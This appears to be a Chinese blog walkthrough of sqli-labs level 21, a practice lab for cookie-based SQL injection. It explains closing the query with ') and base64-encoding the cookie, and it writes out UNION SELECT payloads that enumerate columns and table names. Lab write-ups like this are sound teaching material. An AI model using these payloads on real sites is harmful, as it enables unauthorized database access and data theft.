sqli-labs(21)

Posted -zhong

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs(21)相关的知识,希望对你有一定的参考价值。

技术图片

cookie注入 引号和括号闭合 base64编码

0X01

看了题目应该是 cookie注入 闭合是‘) 那么base64编码是什么鬼??

看源码解决吧

https://www.cnblogs.com/yuanwanli/p/5808472.html setcookie()函数的介绍

技术图片

然后在查询比对与之前真确的时候输入的cookie是否符合

技术图片

0X01构造语句进行注入

那我们的目的是将 输入的数据 通过base64解码后 变成(‘’)要填充的数据

所以直接把我们的语句先base64加密在放进去就行了  那我们来构造语句

http://tool.oschina.net/encrypt?type=3 在线编码的地址
1‘) union select 1,database(),3#

技术图片

但是好像失败了  对不是好像 是确实失败了

技术图片

why?

在线url编码的工具

http://tool.chinaz.com/tools/urlencode.aspx

技术图片

看这里 = 好像被url加密了 是不是我们的符号不能直接base?

尝试一下  验证一下

不是的 是我操作失误了

那我们继续回归正题

) union select 1,2,3#

技术图片

这里知道 2,3 是显示位置

技术图片

那我们的语句就可以从2,3下手了

这里直接演示一下爆表名

) union select 1,(select table_name from information_schema.tables where table_schema=security limit 0,1),3#
JykgdW5pb24gc2VsZWN0IDEsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyBsaW1pdCAwLDEpLDMj

成功绕过

技术图片

其他的构造方法就是以此类推 学到这里了 应该不需要多讲了 所以 我们 到此 over

 

切记 少就是多 慢就是快

以上是关于sqli-labs(21)的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)

sqli-labs靶场1-6关

21个常用代码片段

sqli-labs闯关之11-20关

sqli-labs

sqli-labs学习